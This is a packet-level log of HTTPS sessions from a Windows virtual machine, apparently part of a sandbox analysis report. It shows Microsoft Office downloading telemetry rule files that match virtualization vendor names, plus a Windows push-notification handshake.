2024-11-21 08:54:04 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.2.6	49808	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:03 UTC	192	OUT	GET /rules/rule120654v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:04 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:04 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT ETag: "0x8DC582BA54DCC28" x-ms-request-id: 40c83c0a-001e-00ad-1e79-3b554b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085404Z-1777c6cb754gvvgfhC1TEBz4rg0000000au000000000g9gy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-21 08:54:04 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.6	49809	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:05 UTC	192	OUT	GET /rules/rule120655v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:06 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:05 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7F164C3" x-ms-request-id: 7bd180c9-401e-008c-0e8c-3a86c2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085405Z-178bfbc474b9xljthC1NYCtw94000000013g00000000ae5g x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:06 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.6	49810	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:05 UTC	192	OUT	GET /rules/rule120656v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:06 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:05 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT ETag: "0x8DC582BA48B5BDD" x-ms-request-id: 138215a1-101e-0017-6465-3b47c7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085405Z-178bfbc474bbbqrhhC1NYCvw7400000001ag00000000aspq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:06 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.6	49811	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:05 UTC	192	OUT	GET /rules/rule120657v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:06 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:06 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT ETag: "0x8DC582B9FF95F80" x-ms-request-id: 906eedcd-201e-0071-4861-3bff15000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085406Z-178bfbc474bgvl54hC1NYCsfuw000000019g000000003155 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-21 08:54:06 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.6	49812	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:06 UTC	192	OUT	GET /rules/rule120658v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:06 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:06 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT ETag: "0x8DC582BB650C2EC" x-ms-request-id: 5304f1e1-001e-005a-6c6b-3bc3d0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085406Z-178bfbc474btrnf9hC1NYCb80g00000001e0000000004m9r x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:06 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.6	49813	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:06 UTC	192	OUT	GET /rules/rule120659v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:06 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:06 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3EAF226" x-ms-request-id: 8e68b2a4-701e-005c-1a8c-3abb94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085406Z-1777c6cb7544n7p6hC1TEByvb40000000b000000000087pw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:06 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.6	49814	40.113.110.67	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:07 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 63 4e 32 35 74 72 77 35 2f 6b 65 4b 56 77 65 46 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 63 38 64 61 35 33 35 63 63 38 64 36 39 37 30 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: cN25trw5/keKVweF.1Context: ec8da535cc8d6970
2024-11-21 08:54:07 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-11-21 08:54:07 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 63 4e 32 35 74 72 77 35 2f 6b 65 4b 56 77 65 46 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 63 38 64 61 35 33 35 63 63 38 64 36 39 37 30 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 65 43 71 62 73 64 2f 4f 79 57 46 57 67 38 45 48 79 4a 70 32 41 41 73 74 73 6a 69 47 75 76 31 58 36 65 5a 55 44 44 2b 51 49 36 44 78 50 50 7a 37 67 77 39 62 51 46 52 5a 79 63 45 47 74 5a 50 4e 4f 44 62 39 4d 74 36 37 78 31 50 72 76 34 46 39 70 71 75 39 63 56 6a 30 49 79 6c 61 6d 67 67 58 79 4f 38 6f 59 58 2f 62 36 50 6d 65 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: cN25trw5/keKVweF.2Context: ec8da535cc8d6970<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAeeCqbsd/OyWFWg8EHyJp2AAstsjiGuv1X6eZUDD+QI6DxPPz7gw9bQFRZycEGtZPNODb9Mt67x1Prv4F9pqu9cVj0IylamggXyO8oYX/b6Pme
2024-11-21 08:54:07 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 63 4e 32 35 74 72 77 35 2f 6b 65 4b 56 77 65 46 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 63 38 64 61 35 33 35 63 63 38 64 36 39 37 30 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: cN25trw5/keKVweF.3Context: ec8da535cc8d6970<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-11-21 08:54:07 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-11-21 08:54:07 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 79 55 7a 46 4f 78 69 57 6e 45 47 72 52 73 79 59 4e 50 74 54 4e 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: yUzFOxiWnEGrRsyYNPtTNw.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.6	49815	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:07 UTC	192	OUT	GET /rules/rule120660v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:08 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:08 GMT Content-Type: text/xml Content-Length: 485 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT ETag: "0x8DC582BB9769355" x-ms-request-id: cf2b2526-c01e-0082-5660-3baf72000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085408Z-178bfbc474bv7whqhC1NYC1fg4000000019g000000003etp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:08 UTC	485	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.6	49816	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:07 UTC	192	OUT	GET /rules/rule120661v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:08 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:08 GMT Content-Type: text/xml Content-Length: 411 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989AF051" x-ms-request-id: 19a81fd9-501e-0078-66bc-3b06cf000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085408Z-r1d97b99577tssmjhC1TEB8kan0000000a40000000001266 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-21 08:54:08 UTC	411	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.6	49817	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:08 UTC	192	OUT	GET /rules/rule120662v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:08 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:08 GMT Content-Type: text/xml Content-Length: 470 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBB181F65" x-ms-request-id: 137cb315-101e-0017-3264-3b47c7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085408Z-178bfbc474bnwsh4hC1NYC2ubs000000016000000000fc63 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:08 UTC	470	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O 